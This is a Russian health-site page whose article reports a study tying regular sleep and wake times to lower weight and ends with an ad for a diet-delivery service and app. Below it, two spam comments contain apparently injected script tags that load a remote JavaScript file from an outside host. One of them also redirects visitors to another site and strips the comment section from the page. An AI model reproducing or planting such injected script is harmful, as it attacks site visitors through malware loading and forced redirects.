Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Во сколько просыпаться, ч...  >>  Во сколько просыпаться, чтобы похудеть в новом году?
 
Обратная связь
 

Во сколько просыпаться, чтобы похудеть в новом году?

Размер шрифта
11 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые считают, что регулярность времени засыпания и пробуждения может влиять на фигуру.

Во сколько проснулся, столько и весишь

Эксперты из двух крупных Западных университетов провели исследование на 300 женщинах с тем, чтобы выяснить, как влияет их сон на вес.

Результаты этой научной работы были опубликованы в журнале American Journal of Health Promotion, резюмировать их можно следующим образом:

1) Последовательное соблюдение режима сна ассоциировано с понижением массы тела

2) Сон менее 6,5 или более 8,5 часов, напротив, может привести к лишним килограммам

3) Качество сна играет немалую роль в формировании фигуры

Сперва женщины прошли антропометрическое обследование (измерение роста, веса и так далее). Далее все они были снабжены особыми датчиками, которые отслеживали все их движения в течение дня и структуру сна – ночью. Продолжительность экспериментальной фазы исследования составила 7 дней.

Ученых больше всего поразила четкая закономерность между массой тела и тем, насколько регулярно человек ложится спать и просыпается: испытуемые, которые дисциплинированно отправлялись на боковую в одно и то же время (с временной вариабельностью не более 60 минут), в целом оказывались стройнее, чем остальные.

Еще более выраженная корреляция имела место касательно времени пробуждения. Говорят: «Кто рано встает, тому Бог подает», однако результаты данного исследования свидетельствуют, что эту поговорку смело можно дополнить – «рано и в одно и то же время». А подает Бог, согласно американским ученым, очень привлекательный бонус – пониженную массу тела.

«Наш организм подчинен строгим суточным ритмам, игнорирование которых может закономерно привести к негативным патофизиологическим последствиям», – утверждает Брюс Бейли, глава научной группы.

Авторы считают, что влияние гигиены сна на массу тела реализуется через посредство ряда гормонов, которые регулируют аппетит и потребление пищи. Не секрет, что многие гормоны секретируются в соответствии с суточными ритмами, грубое вмешательство в которые может нарушать хрупкий эндокринный баланс.

Кроме того, ученые обнаружили, что, как это нередко бывает, важно не только количество, но и качество. Под качеством сна понимается сумма часов, потраченных непосредственно на сон, а не на ворочание в постели, полудрем и тому подобное. Чем выше качество сна – тем лучше для фигуры, убеждены авторы.

Закономерный вопрос: как повысить его, это самое качество? «Нужно заниматься физическими упражнениями, поддерживать тишину и прохладную температуру в комнате, избегать источников света поздним вечером и использовать кровать только для сна», – отвечает доктор Бейли.

«Сон часто приносится в жертву нашим деловым амбициям и желанию успеть как можно больше. Но расплачиваться придется своим здоровьем, в том числе – лишним весом».

Поэтому ложитесь и вставайте в одно и то же время, если ходите похудеть! А пока не спите – попробуйте Диету Елены Малышевой! Уже готовая правильная еда будет доставлена вам в любое удобное место и время. Но теперь худеть стало еще проще с новым приложением Диета Елены Малышевой для ваших iPhone! Вам остается только есть и худеть!

О других способах борьбы с ожирением читайте на страницах нашего специального проекта «Сбрось лишнее».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Не выспались? Вы потолстеете!   Суперпродукты для похудения   Диета, чтобы не сойти с ума   5 неожиданных причин, почему вы толстеете  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 
21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть! 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 

Слайдшоу

1
Привычки, которые делают вас толстым. Часть 2
Как похудеть суперзанятым женщинам?
Супереда для быстрого похудения

Тесты

1
Какое мороженное съесть, чтобы похудеть
Хорошо ли Вы спите?
Есть ли у вас избыточный вес?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.